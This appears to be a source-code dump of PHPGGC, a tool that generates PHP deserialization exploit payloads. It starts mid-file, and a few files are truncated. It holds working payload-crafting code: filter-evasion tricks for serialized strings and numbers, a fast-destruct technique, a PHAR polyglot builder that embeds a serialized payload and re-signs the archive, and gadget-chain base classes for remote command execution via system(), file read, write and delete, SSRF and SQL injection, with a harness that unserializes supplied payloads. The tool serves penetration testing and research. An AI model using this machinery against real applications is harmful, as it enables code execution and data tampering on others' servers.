PREG_OFFSET_CAPTURE, $current 25 | ) 26 | ) 27 | { 28 | 29 | $p_start = $matches[0][1]; 30 | $p_start_string = $p_start + strlen($matches[0][0]); 31 | $length = $matches[1][0]; 32 | $p_end_string = $p_start_string + $length; 33 | 34 | # Check if this really is a serialized string 35 | if(!( 36 | strlen($serialized) > $p_end_string + 2 && 37 | substr($serialized, $p_end_string, 2) == '";' 38 | )) 39 | { 40 | $current = $p_start_string; 41 | continue; 42 | } 43 | $string = substr($serialized, $p_start_string, $length); 44 | 45 | # Convert every special character to its S representation 46 | $clean_string = ''; 47 | for($i=0; $i < strlen($string); $i++) 48 | { 49 | $letter = $string[$i]; 50 | $clean_string .= ctype_print($letter) && $letter != '\\' ? 51 | $letter : 52 | sprintf("\\%02x", ord($letter)); 53 | ; 54 | } 55 | 56 | # Make the replacement 57 | $new .= 58 | substr($serialized, $last, $p_start - $last) . 59 | 'S:' . $matches[1][0] . ':"' . $clean_string . '";' 60 | ; 61 | $last = $p_end_string + 2; 62 | $current = $last; 63 | } 64 | 65 | $new .= substr($serialized, $last); 66 | return $new; 67 | } 68 | } -------------------------------------------------------------------------------- /lib/PHPGGC/Enhancement/Enhancement.php: -------------------------------------------------------------------------------- 1 | enhancements = $enhancements; 10 | } 11 | 12 | /** 13 | * Calls method $method on every enhancement. 14 | */ 15 | public function __call($method, $arguments) 16 | { 17 | $argument = $arguments[0]; 18 | foreach($this->enhancements as $enhancement) 19 | { 20 | $argument = $enhancement->$method( 21 | $argument 22 | ); 23 | } 24 | return $argument; 25 | } 26 | } -------------------------------------------------------------------------------- /lib/PHPGGC/Enhancement/FastDestruct.php: -------------------------------------------------------------------------------- 1 | $object, $key + 1 => $key]; 34 | } 35 | 36 | /** 37 | * Post process step of the fast-destruct technique: replaces the original 38 | * array with an array with the two same keys. 39 | */ 40 | public function process_serialized($serialized) 41 | { 42 | /* 43 | This replaces the whole array structure, but it could not work in some 44 | edge cases. The second technique is more permissive but should not cause 45 | problems. 46 | 47 | $find = ( 48 | '#a:2:{' . 49 | 'i:' . self::FAST_DESTRUCT_TEMP_KEY . ';' . 50 | '(.*?)' . 51 | 'i:' . (self::FAST_DESTRUCT_TEMP_KEY + 1) . ';' . 52 | 'i:' . self::FAST_DESTRUCT_TEMP_KEY . ';' . 53 | '}#s' 54 | ); 55 | $replace = ( 56 | 'a:2:{' . 57 | 'i:' . self::FAST_DESTRUCT_FINAL_KEY . ';' . 58 | '\1' . 59 | 'i:' . self::FAST_DESTRUCT_FINAL_KEY . ';' . 60 | 'i:' . self::FAST_DESTRUCT_FINAL_KEY . ';' . 61 | '}' 62 | ); 63 | */ 64 | $find = ( 65 | '#i:(' . 66 | self::FAST_DESTRUCT_TEMP_KEY . '|' . 67 | (self::FAST_DESTRUCT_TEMP_KEY + 1) . 68 | ');#' 69 | ); 70 | $replace = 'i:' . self::FAST_DESTRUCT_FINAL_KEY . ';'; 71 | return preg_replace($find, $replace, $serialized); 72 | } 73 | } -------------------------------------------------------------------------------- /lib/PHPGGC/Enhancement/PlusNumbers.php: -------------------------------------------------------------------------------- 1 | O:+3:"Abc":+1:{s:+1:"x";i:+3;} 9 | * With 's': 10 | * O:3:"Abc":1:{s:1:"x";i:3;} -> O:3:"Abc":1:{s:+1:"x";i:3;} 11 | * 12 | * Note: Since PHP 7.2, only i and d (float) types can be prefixed by 13 | * a plus sign. 14 | */ 15 | class PlusNumbers extends Enhancement 16 | { 17 | private $types; 18 | 19 | public function __construct($types) 20 | { 21 | $this->types = $types; 22 | } 23 | 24 | public function process_serialized($serialized) 25 | { 26 | $types = preg_quote($this->types, '#'); 27 | $serialized = preg_replace( 28 | '#\b([' . $types . ']):(\d+)([:;])#', 29 | '$1:+$2$3', 30 | $serialized 31 | ); 32 | return $serialized; 33 | } 34 | } -------------------------------------------------------------------------------- /lib/PHPGGC/Enhancement/Wrapper.php: -------------------------------------------------------------------------------- 1 | _call_if_exists('process_parameters', $parameters); 42 | } 43 | 44 | public function process_object($payload) 45 | { 46 | return $this->_call_if_exists('process_object', $payload); 47 | } 48 | 49 | public function process_serialized($serialized) 50 | { 51 | return $this->_call_if_exists('process_serialized', $serialized); 52 | } 53 | } -------------------------------------------------------------------------------- /lib/PHPGGC/Exception.php: -------------------------------------------------------------------------------- 1 | \PHPGGC\Util::rand_file('test file delete') 16 | ]; 17 | } 18 | 19 | public function test_confirm($arguments, $output) 20 | { 21 | return !file_exists($arguments['remote_path']); 22 | } 23 | 24 | public function test_cleanup($arguments) 25 | { 26 | if(file_exists($arguments['remote_path'])) 27 | unlink($arguments['remote_path']); 28 | } 29 | } -------------------------------------------------------------------------------- /lib/PHPGGC/GadgetChain/FileRead.php: -------------------------------------------------------------------------------- 1 | \PHPGGC\Util::rand_file('test file read') 16 | ]; 17 | } 18 | 19 | public function test_confirm($arguments, $output) 20 | { 21 | $expected = file_get_contents($arguments['remote_path']); 22 | return strpos($output, $expected) !== false; 23 | } 24 | 25 | public function test_cleanup($arguments) 26 | { 27 | if(file_exists($arguments['remote_path'])) 28 | unlink($arguments['remote_path']); 29 | } 30 | } -------------------------------------------------------------------------------- /lib/PHPGGC/GadgetChain/FileWrite.php: -------------------------------------------------------------------------------- 1 | \PHPGGC\Util::rand_file('test file write'), 28 | 'remote_path' => \PHPGGC\Util::rand_path('', '.test') 29 | ]; 30 | } 31 | 32 | public function test_confirm($arguments, $output) 33 | { 34 | if(!file_exists($arguments['remote_path'])) 35 | return false; 36 | 37 | $expected = file_get_contents($arguments['local_path']); 38 | $obtained = file_get_contents($arguments['remote_path']); 39 | 40 | return strpos($obtained, $expected) !== false; 41 | } 42 | 43 | public function test_cleanup($arguments) 44 | { 45 | if(file_exists($arguments['remote_path'])) 46 | unlink($arguments['remote_path']); 47 | if(file_exists($arguments['local_path'])) 48 | unlink($arguments['local_path']); 49 | } 50 | } -------------------------------------------------------------------------------- /lib/PHPGGC/GadgetChain/PHPInfo.php: -------------------------------------------------------------------------------- 1 | __test_rand_token = sha1(rand()); 19 | $this->__test_rand_path = \PHPGGC\Util::rand_path(); 20 | return 21 | 'echo ' . $this->__test_rand_token . 22 | ' > ' . $this->__test_rand_path 23 | ; 24 | } 25 | 26 | public function test_confirm($arguments, $output) 27 | { 28 | if(!file_exists($this->__test_rand_path)) 29 | return false; 30 | $result = file_get_contents($this->__test_rand_path); 31 | return strpos($result, $this->__test_rand_token) !== false; 32 | } 33 | 34 | public function test_cleanup($arguments) 35 | { 36 | if(file_exists($this->__test_rand_path)) 37 | unlink($this->__test_rand_path); 38 | } 39 | } -------------------------------------------------------------------------------- /lib/PHPGGC/GadgetChain/RCE/Command.php: -------------------------------------------------------------------------------- 1 | _test_build_command(); 20 | return [ 21 | 'command' => $command 22 | ]; 23 | } 24 | } -------------------------------------------------------------------------------- /lib/PHPGGC/GadgetChain/RCE/FunctionCall.php: -------------------------------------------------------------------------------- 1 | _test_build_command(); 21 | return [ 22 | 'function' => 'system', 23 | 'parameter' => 24 | $command 25 | ]; 26 | } 27 | } -------------------------------------------------------------------------------- /lib/PHPGGC/GadgetChain/RCE/PHPCode.php: -------------------------------------------------------------------------------- 1 | _test_build_command(); 22 | return [ 23 | 'code' => 'system(' . var_export($command, true) . ');' 24 | ]; 25 | } 26 | } -------------------------------------------------------------------------------- /lib/PHPGGC/GadgetChain/SSRF.php: -------------------------------------------------------------------------------- 1 | 22 | -------------------------------------------------------------------------------- /lib/PHPGGC/GadgetChain/SqlInjection.php: -------------------------------------------------------------------------------- 1 | 'test.txt', 16 | 'prefix' => '' 17 | ]; 18 | 19 | /** 20 | * Creates an instance of a PHAR file format. 21 | * 22 | * @param string $metadata PHAR's metadata (serialized payload) 23 | * @param array $parameters 24 | */ 25 | public function __construct($metadata, $parameters=[]) 26 | { 27 | $this->metadata = $metadata; 28 | $this->parameters = $parameters + $this->parameters; 29 | } 30 | 31 | /** 32 | * Generates the contents of the PHAR file. 33 | * 34 | * @returns string Content of generated PHAR file 35 | */ 36 | public function generate() 37 | { 38 | $this->generate_dummy_metadata(); 39 | $this->generate_base_phar(); 40 | $this->replace_metadata(); 41 | $this->update_signature(); 42 | return $this->data; 43 | } 44 | 45 | protected function generate_base_phar() 46 | { 47 | $path = ( 48 | sys_get_temp_dir() . DIRECTORY_SEPARATOR . 49 | 'phpggc' . $this->format . '.phar' 50 | ); 51 | @unlink($path); 52 | 53 | $phar = new \Phar($path); 54 | $phar->startBuffering(); 55 | $phar->addFromString("dummy", 'test'); 56 | $phar->addFromString($this->parameters['filename'], 'test'); 57 | $phar->setStub( 58 | $this->parameters['prefix'] . 59 | '' 60 | ); 61 | $phar->setMetadata($this->dummy_metadata); 62 | 63 | # Since we might generate a new signature, we need to make sure the 64 | # algorithm is valid 65 | $phar->setSignatureAlgorithm(\Phar::SHA1); 66 | $phar->stopBuffering(); 67 | 68 | $this->data = file_get_contents($path); 69 | unlink($path); 70 | } 71 | 72 | protected function generate_dummy_metadata() 73 | { 74 | # We want our fake metadata to have the same size as our serialized 75 | # payload, so that we can make an in-place replacement in archives 76 | $dummy_size = strlen($this->metadata) - strlen('s::"";'); 77 | $dummy_size = $dummy_size - strlen($dummy_size); 78 | $this->dummy_metadata = str_repeat('A', $dummy_size); 79 | } 80 | 81 | /** 82 | * Updates the PHAR signature of the file. 83 | * It is format-dependant and therefore abstract. 84 | */ 85 | abstract protected function update_signature(); 86 | 87 | /** 88 | * Makes an in-place replacement at $offset in $data 89 | */ 90 | protected function in_place_replace($data, $offset, $change) 91 | { 92 | return 93 | substr($data, 0, $offset) . 94 | $change . 95 | substr($data, $offset + strlen($change)) 96 | ; 97 | } 98 | 99 | /** 100 | * Returns the signature for given data. 101 | */ 102 | protected function compute_signature($data) 103 | { 104 | return hex2bin(sha1($data)); 105 | } 106 | 107 | /** 108 | * Replaces every occurence of the fake metadata by the real one. 109 | */ 110 | protected function replace_metadata() 111 | { 112 | $this->data = str_replace( 113 | serialize($this->dummy_metadata), $this->metadata, $this->data 114 | ); 115 | } 116 | } -------------------------------------------------------------------------------- /lib/PHPGGC/Phar/Phar.php: -------------------------------------------------------------------------------- 1 | data, 0, -28); 13 | $signature = $this->compute_signature($data); 14 | $this->data = $this->in_place_replace($this->data, -28, $signature); 15 | } 16 | } -------------------------------------------------------------------------------- /lib/PHPGGC/Phar/Zip.php: -------------------------------------------------------------------------------- 1 | ' . "\n"); 11 | exit(0); 12 | } 13 | 14 | $vector = $argv[1]; 15 | $payload = base64_decode($argv[2]); 16 | 17 | if(file_exists('test.php')) 18 | { 19 | require('test.php'); 20 | exit(0); 21 | } 22 | if(!file_exists('vendor/autoload.php')) 23 | { 24 | print('Unable to load either test.php or vendor/autoload.php' . "\n"); 25 | exit(-1); 26 | } 27 | 28 | require('vendor/autoload.php'); 29 | 30 | # The payload must be processed in function of its form: 31 | # Phar: Try to get the content of the only file in the PHAR file 32 | switch($vector) 33 | { 34 | case 'phar': 35 | $phar = sys_get_temp_dir() . '/phpggc.phar'; 36 | file_put_contents($phar, $payload); 37 | var_dump(file_get_contents('phar://' . $phar . '/test.txt')); 38 | unlink($phar); 39 | break; 40 | case '__toString': 41 | $payload = unserialize($payload); 42 | print($payload); 43 | break; 44 | case '__destruct': 45 | case '__wakeup': 46 | $payload = unserialize($payload); 47 | break; 48 | default: 49 | print('Unable to test payload via vector "' . $vector . '"' . "\n"); 50 | } -------------------------------------------------------------------------------- /other/debug_rce/debug_rce.php: -------------------------------------------------------------------------------- 1 | generate(); 13 | } 14 | catch(\PHPGGC\Exception $e) 15 | { 16 | print("ERROR: " . $e->getMessage() . "\n"); 17 | exit(1); 18 | } 19 | -------------------------------------------------------------------------------- /templates/chain.php: -------------------------------------------------------------------------------- 1 |